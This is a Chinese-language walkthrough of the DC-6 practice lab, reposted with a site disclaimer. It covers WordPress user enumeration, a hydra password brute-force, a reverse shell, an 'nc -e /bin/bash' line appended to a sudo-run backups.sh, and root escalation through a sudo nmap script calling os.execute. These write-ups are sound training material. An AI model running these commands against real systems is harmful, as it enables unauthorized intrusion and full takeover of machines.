标签:shell jens DC 提权 sh backups graham
DC-6
目录信息收集
先把wordy加到host中
nmap -T4 -A -p 1-65535 192.168.211.138
又是wordpress,扫一下
wpscan --url http://wordy/ --enumerate u
admin
sarah
graham
mark
jens
用户爆破
hydra爆破一下
hydra -L/root/桌面/username.txt -P /home/zidian/rockyou.txt wordy http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:<title>invalido</title>' -F
不知道为什么,每次爆破的密码不一样。换wpscan再爆破试试
爆了200M数据还没爆出来,不知道他们是怎么爆的,我嫖了
mark : helpdesk01
命令执行
在该模块下可以直接进行命令执行
但是网页中,输入受限,在burp中进行,直接弹shell
反弹shell
python -c 'import pty;pty.spawn("/bin/bash")'
成功反弹shell
提权
WWW-DATA到graham
系统SUID,内核提权好像都不可以,在/home下不同用户目录中查找是否能找到一些有用的信息
在/home/mark/stuff/things-to-do.txt内
似乎是graham用户的密码,那我们尝试登陆,即可以从web权限提升到用户权限
登陆成功
graham到jens
sudo -l
意思是graham用户可以执行backups.sh,jens执行备份文件不需要密码,我们看一下权限
ls -alR /home/jens/backups.sh
cat /etc/group
确实graham用户可以修改backups.sh,那我们加入反弹shell命令进可执行文件中,让jens执行
echo 'nc -e /bin/bash 192.168.211.131 9999' >> backups.sh
sudo -u jens ./backups.sh
jens到root
jens
直接可以执行nmap
5.2.0 之后,nmap 可以通过执行脚本来提权
echo 'os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell
获取flag
标签:shell,jens,DC,提权,sh,backups,graham 来源: https://www.cnblogs.com/karsa/p/15849408.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。